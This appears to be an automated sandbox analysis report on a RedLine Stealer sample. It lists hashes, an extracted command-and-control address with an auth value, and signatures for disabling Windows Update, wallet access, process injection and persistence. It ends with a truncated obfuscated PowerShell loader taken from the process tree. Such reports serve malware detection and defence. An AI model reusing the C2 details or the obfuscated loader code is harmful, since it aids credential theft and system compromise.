Analysis
-
max time kernel
150s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30/01/2023, 19:02
Static task
static1
Behavioral task
behavioral1
Sample
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
Resource
win10v2004-20220812-en
General
-
Target
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
-
Size
360KB
-
MD5
9c0c75bb31dfa46b2c91c12693bf45dd
-
SHA1
b405694fbedc3ed57f486a0bd892fb48b2917d49
-
SHA256
c332e200a4050d2b0e7cb33ddbed8e8cd6caff60653cb30a1f76bec08031cbbe
-
SHA512
cc666cfd32f070b859bdfcb5391fe160a7456c00426e806736a459044205558a579d45092eedaf31a90a90ccd0957948bccce248bbc5cdcef7f5885f44e37b44
-
SSDEEP
6144:FUzcknZ/qA5koqdrF7ENQ8zxT8iz5ZhHS7gVFy6d3bBum+WOmekGAOIA40e8aHc:FUwg/qA5Zz28zxT8yZZSUVFV14kG+0e2
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4232-167-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 3204 created 4264 3204 WerFault.exe 59 PID 2832 created 3384 2832 WerFault.exe 41 PID 4168 created 3744 4168 WerFault.exe 132 PID 1116 created 5080 1116 WerFault.exe 135 -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 4696 created 2644 4696 SmartDefRun.exe 38 PID 4696 created 2644 4696 SmartDefRun.exe 38 PID 4696 created 2644 4696 SmartDefRun.exe 38 PID 4696 created 2644 4696 SmartDefRun.exe 38 PID 176 created 620 176 powershell.EXE 3 PID 5008 created 3384 5008 svchost.exe 41 PID 5008 created 4264 5008 svchost.exe 59 PID 5008 created 3744 5008 svchost.exe 132 PID 5008 created 5080 5008 svchost.exe 135 -
Blocklisted process makes network request 1 IoCs
flow pid Process 17 1748 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 940 new2.exe 4780 C4Loader.exe 4696 SmartDefRun.exe 1416 SysApp.exe 2072 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 10 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2472 set thread context of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 940 set thread context of 4232 940 new2.exe 93 PID 4696 set thread context of 4788 4696 SmartDefRun.exe 119 PID 176 set thread context of 3504 176 powershell.EXE 124 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4908 sc.exe 2448 sc.exe 3040 sc.exe 4596 sc.exe 4728 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 3400 2472 WerFault.exe 78 1768 940 WerFault.exe 89 1496 3384 WerFault.exe 41 2676 4264 WerFault.exe 59 4240 3744 WerFault.exe 132 5104 5080 WerFault.exe 135 -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3728 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CBAD3673-59B1-4CAE-9103-3B3D1CDA7408}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1675108979" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C008158F7561" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C008158F7561 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000006cb85ca0979c494481881a62fc14f95600000000020000000000106600000001000020000000a684e0dede9ea58939e09e04403c7e1ada7d79d50de292f3750292e324290aef000000000e8000000002000020000000f8ee218eaeddba757762e982203e70d6d883b247f33576ea65f2f21e666c138c800000006181c5fed5c54d94767cfce9978674856d90bb36a74baf9d8ac878ac16753423673b9c9818c6d357bc4e2efe1ef8f8bdb2a884fcb1432d18b7b53b56faee37efedf4bfeadde8947be5970328e12921ba8ba00ec4f599a5d87a0795a012f0241bdab522b093cd1bbe326eab4aafd1861659bd89af2080fc45a72e2a5fd5cb0f7640000000f07c2eab35d9d58b6bc89cbc73288e8bf008c4cc3d6b447f88db3b8576b94b59fd5931910e4404505dbb1e4010d5f1a5e8d342c8cfb4501a3a39c5f72838d804 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1748 powershell.exe 1748 powershell.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 1416 SysApp.exe 4232 vbc.exe 4696 SmartDefRun.exe 4696 SmartDefRun.exe 2224 powershell.exe 2224 powershell.exe 4696 SmartDefRun.exe 4696 SmartDefRun.exe 4696 SmartDefRun.exe 4696 SmartDefRun.exe 1164 powershell.exe 1164 powershell.exe 4696 SmartDefRun.exe 4696 SmartDefRun.exe 176 powershell.EXE 1420 powershell.EXE 176 powershell.EXE 1420 powershell.EXE 176 powershell.EXE 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe 3504 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2644 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 4232 vbc.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeIncreaseQuotaPrivilege 1164 powershell.exe Token: SeSecurityPrivilege 1164 powershell.exe Token: SeTakeOwnershipPrivilege 1164 powershell.exe Token: SeLoadDriverPrivilege 1164 powershell.exe Token: SeSystemProfilePrivilege 1164 powershell.exe Token: SeSystemtimePrivilege 1164 powershell.exe Token: SeProfSingleProcessPrivilege 1164 powershell.exe Token: SeIncBasePriorityPrivilege 1164 powershell.exe Token: SeCreatePagefilePrivilege 1164 powershell.exe Token: SeBackupPrivilege 1164 powershell.exe Token: SeRestorePrivilege 1164 powershell.exe Token: SeShutdownPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeSystemEnvironmentPrivilege 1164 powershell.exe Token: SeRemoteShutdownPrivilege 1164 powershell.exe Token: SeUndockPrivilege 1164 powershell.exe Token: SeManageVolumePrivilege 1164 powershell.exe Token: 33 1164 powershell.exe Token: 34 1164 powershell.exe Token: 35 1164 powershell.exe Token: 36 1164 powershell.exe Token: SeIncreaseQuotaPrivilege 1164 powershell.exe Token: SeSecurityPrivilege 1164 powershell.exe Token: SeTakeOwnershipPrivilege 1164 powershell.exe Token: SeLoadDriverPrivilege 1164 powershell.exe Token: SeSystemProfilePrivilege 1164 powershell.exe Token: SeSystemtimePrivilege 1164 powershell.exe Token: SeProfSingleProcessPrivilege 1164 powershell.exe Token: SeIncBasePriorityPrivilege 1164 powershell.exe Token: SeCreatePagefilePrivilege 1164 powershell.exe Token: SeBackupPrivilege 1164 powershell.exe Token: SeRestorePrivilege 1164 powershell.exe Token: SeShutdownPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeSystemEnvironmentPrivilege 1164 powershell.exe Token: SeRemoteShutdownPrivilege 1164 powershell.exe Token: SeUndockPrivilege 1164 powershell.exe Token: SeManageVolumePrivilege 1164 powershell.exe Token: 33 1164 powershell.exe Token: 34 1164 powershell.exe Token: 35 1164 powershell.exe Token: 36 1164 powershell.exe Token: SeIncreaseQuotaPrivilege 1164 powershell.exe Token: SeSecurityPrivilege 1164 powershell.exe Token: SeTakeOwnershipPrivilege 1164 powershell.exe Token: SeLoadDriverPrivilege 1164 powershell.exe Token: SeSystemProfilePrivilege 1164 powershell.exe Token: SeSystemtimePrivilege 1164 powershell.exe Token: SeProfSingleProcessPrivilege 1164 powershell.exe Token: SeIncBasePriorityPrivilege 1164 powershell.exe Token: SeCreatePagefilePrivilege 1164 powershell.exe Token: SeBackupPrivilege 1164 powershell.exe Token: SeRestorePrivilege 1164 powershell.exe Token: SeShutdownPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeSystemEnvironmentPrivilege 1164 powershell.exe Token: SeRemoteShutdownPrivilege 1164 powershell.exe Token: SeUndockPrivilege 1164 powershell.exe Token: SeManageVolumePrivilege 1164 powershell.exe Token: 33 1164 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 2472 wrote to memory of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 2472 wrote to memory of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 2472 wrote to memory of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 2472 wrote to memory of 2864 2472 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 80 PID 2864 wrote to memory of 1748 2864 vbc.exe 84 PID 2864 wrote to memory of 1748 2864 vbc.exe 84 PID 2864 wrote to memory of 1748 2864 vbc.exe 84 PID 1748 wrote to memory of 940 1748 powershell.exe 89 PID 1748 wrote to memory of 940 1748 powershell.exe 89 PID 1748 wrote to memory of 940 1748 powershell.exe 89 PID 1748 wrote to memory of 4780 1748 powershell.exe 91 PID 1748 wrote to memory of 4780 1748 powershell.exe 91 PID 1748 wrote to memory of 4780 1748 powershell.exe 91 PID 1748 wrote to memory of 4696 1748 powershell.exe 92 PID 1748 wrote to memory of 4696 1748 powershell.exe 92 PID 940 wrote to memory of 4232 940 new2.exe 93 PID 940 wrote to memory of 4232 940 new2.exe 93 PID 940 wrote to memory of 4232 940 new2.exe 93 PID 940 wrote to memory of 4232 940 new2.exe 93 PID 1748 wrote to memory of 1416 1748 powershell.exe 94 PID 1748 wrote to memory of 1416 1748 powershell.exe 94 PID 1748 wrote to memory of 1416 1748 powershell.exe 94 PID 940 wrote to memory of 4232 940 new2.exe 93 PID 864 wrote to memory of 4596 864 cmd.exe 118 PID 864 wrote to memory of 4596 864 cmd.exe 118 PID 864 wrote to memory of 3040 864 cmd.exe 117 PID 864 wrote to memory of 3040 864 cmd.exe 117 PID 864 wrote to memory of 2448 864 cmd.exe 116 PID 864 wrote to memory of 2448 864 cmd.exe 116 PID 864 wrote to memory of 4728 864 cmd.exe 109 PID 864 wrote to memory of 4728 864 cmd.exe 109 PID 864 wrote to memory of 4908 864 cmd.exe 110 PID 864 wrote to memory of 4908 864 cmd.exe 110 PID 864 wrote to memory of 4576 864 cmd.exe 115 PID 864 wrote to memory of 4576 864 cmd.exe 115 PID 864 wrote to memory of 1628 864 cmd.exe 114 PID 864 wrote to memory of 1628 864 cmd.exe 114 PID 864 wrote to memory of 3012 864 cmd.exe 113 PID 864 wrote to memory of 3012 864 cmd.exe 113 PID 864 wrote to memory of 1576 864 cmd.exe 111 PID 864 wrote to memory of 1576 864 cmd.exe 111 PID 864 wrote to memory of 4188 864 cmd.exe 112 PID 864 wrote to memory of 4188 864 cmd.exe 112 PID 4696 wrote to memory of 4788 4696 SmartDefRun.exe 119 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 176 wrote to memory of 3504 176 powershell.EXE 124 PID 3504 wrote to memory of 620 3504 dllhost.exe 3 PID 3504 wrote to memory of 672 3504 dllhost.exe 4 PID 3504 wrote to memory of 952 3504 dllhost.exe 75 PID 3504 wrote to memory of 1016 3504 dllhost.exe 10 PID 3504 wrote to memory of 432 3504 dllhost.exe 11 PID 3504 wrote to memory of 752 3504 dllhost.exe 74 PID 3504 wrote to memory of 424 3504 dllhost.exe 73 PID 3504 wrote to memory of 1040 3504 dllhost.exe 72 PID 3504 wrote to memory of 1152 3504 dllhost.exe 13 PID 3504 wrote to memory of 1196 3504 dllhost.exe 16
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1016
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{deb96dc5-bd3c-4c34-b0a7-abe76dc04500}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3504
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1152 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hhqotgSaPHVU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sXsJVmBLcbiqza,[Parameter(Position=1)][Type]$TqjYLwmcjY)$ZJiqJqSragC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+'ct'+'e'+'d'+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+'p'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$ZJiqJqSragC.DefineConstructor(''+[Char](82)+'TS'+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sXsJVmBLcbiqza).SetImplementationFlags('Runt'+'i'+''+[Char](109)+''+'e'+''+','+''+'M'+''+[Char](97)+'n'+'a'+''+'g'+''+'e'+''+[Char](100)+'');$ZJiqJqSragC.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+'l'+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+'B'+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+'N'+'ew'+'S'+''+[Char](108)+'o'+[Char](116)+','+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$TqjYLwmcjY,$sXsJVmBLcbiqza).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+